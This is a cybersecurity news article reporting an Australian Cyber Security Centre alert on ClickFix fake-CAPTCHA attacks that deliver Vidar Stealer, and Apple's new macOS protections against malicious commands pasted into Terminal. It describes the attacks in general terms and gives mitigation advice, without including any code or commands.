The Australian Cyber Security Centre (ACSC) has stepped in to warn users of an active attack campaign targeting Windows users with Vidar Stealer malware, which is delivered through the so-called ClickFix social engineering technique.
This is the first time ACSC, part of the Australian SIgnals Directorate (ASD) intelligence agency, has issued a separate alert for ClickFix, an attack technique that has become increasingly common over the past few years.
ClickFix relies on tricking users into essentially hacking themselves by running commands that compromise their computers.
In the current attack, the threat actor uses a fake Cloudflare CAPTCHA verification prompt.
ACSC said that the attack uses compromised WordPress websites belonging to legitimate Australian businesses, which have the fake CAPTCHA code injected.
On the sites, malicious Javascript code downloads an obfuscated Windows Powershell command from an application programming interface (API) server controlled by the attacker and copies it into the clipboard of the user’s computer.
Once a user interacts with the fake CAPTCHA by clicking on “Verify that you are human”, a pop-up appears, asking the victim to run the command in the clipboard, with administrator privileges.
Vidar Stealer has been active since 2018, and ACSC said the malware’s command and control (C2) infrastructure is retrieved through dead-drop links, using publicly accessible services such as comms app Telegram bots, and games platform Steam profiles.
That C2 infrastructure is designed to hinder detection and takedown efforts, ACSC wrote.
ACSC recommended that government entities, organisations, businesses and individuals implement its guidance to restricts the ability of untrusted applications and scripts to execute, to protect against ClickFix attacks.
WordPress administrators should patch their sites, and remove unused, unsupported and/or deprecated themes and plugins, to reduce the risk of compromise.
Apple adds ClickFix protection
As the ClickFix problem grows, technology vendors are seeking to protect their users against attacks by building in detection for deceptive and dangerous commands.
Microsoft’s Defender Security Research Team (DSRT) documented a ClickFix campaign, active since early 2026, which purports to install system utilities as users visit what appears to be troubleshooting sites hosted on Medium, Craft and other locations.
Instead, the commands pasted into the macOS Terminal utility load infostealing malware such as Macsync, Shub Stealer and AMOS onto users’ computers.
These collect and exfiltrate media files, Apple iCloud data and macOS Keychain entries, along with cryptocurrency wallet keys.
The Defender team also found that in some variants of the campaign, the cryptocurrency wallets are replaced by trojanised versions.
Whereas running macOS application bundles through the graphical Finder file viewer is subject to the built-in Gatekeeper security utility protections such as code signing and notarisation, this is not the case for code executed in Terminal.
To counter the threat, Apple has updated the signatures for its XProtect anti-malware scanner.
Apple has also added a new security prompt in version 26.4 of macOS which displays an explicit warning that what they pasted into Terminal is possible malware, and the system has blocked it.
This is followed by further advice by Apple on how scammers encourage users to paste text into Terminal, to try to harm victims’ Macs and to compromise their privacy.
